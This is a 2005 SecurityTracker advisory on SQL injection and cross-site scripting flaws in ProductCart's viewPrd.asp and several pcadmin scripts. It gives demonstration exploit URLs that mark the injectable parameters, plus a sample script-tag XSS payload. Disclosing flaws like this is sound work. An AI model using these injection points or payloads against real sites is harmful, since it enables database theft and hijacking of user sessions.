ProductCart Input Validation Flaws in 'viewPrd.asp' and Various 'pcadmin' Scripts Lets Remote Users Inject SQL Commands
SecurityTracker Alert ID:  1014129
SecurityTracker URL:  http://securitytracker.com/id/1014129
CVE Reference:   CVE-2005-1967, CVE-2005-1968, CVE-2005-2445   (Links to External Site)
Updated:  Nov 2 2008
Original Entry Date:  Jun 8 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information

Version(s): 2.7 and prior versions
Description:   Dedi Dwianto from echo.or.id reported a vulnerability in ProductCart. A remote user can inject SQL commands and conduct cross-site scripting attacks.

The software does not properly validate user-supplied input. A remote user can supply specially crafted parameter values to execute SQL commands on the underlying database.

Some demonstration exploit URLs are provided:

http://[target]/pc/viewPrd.asp?idcategory=[catid][SQL INJECTION]&idproduct=[prod id]

http://[target]/pc/pcadmin/editCategories.asp?nav=&lid=[id cat][sql injection]

http://[target]/pc/pcadmin/modCustomCardPaymentOpt.asp?mode=Edit&idc=[page][sqlinjection]&id=[id]&gwCode=[code]

http://[target]/pc/pcadmin/OptionFieldsEdit.asp?idc=1&id=[id]&idccr=[id][sql Injection]

A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the vulnerable software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/pc/pcadmin/techErr.asp?error=<script>alert('document.cookie')</script>

The original advisory is available at:

http://echo.or.id/adv/adv16-theday-2005.txt

Impact:   A remote user can execute SQL commands on the underlying database.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the ProductCart software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Solution:   No solution was available at the time of this entry.
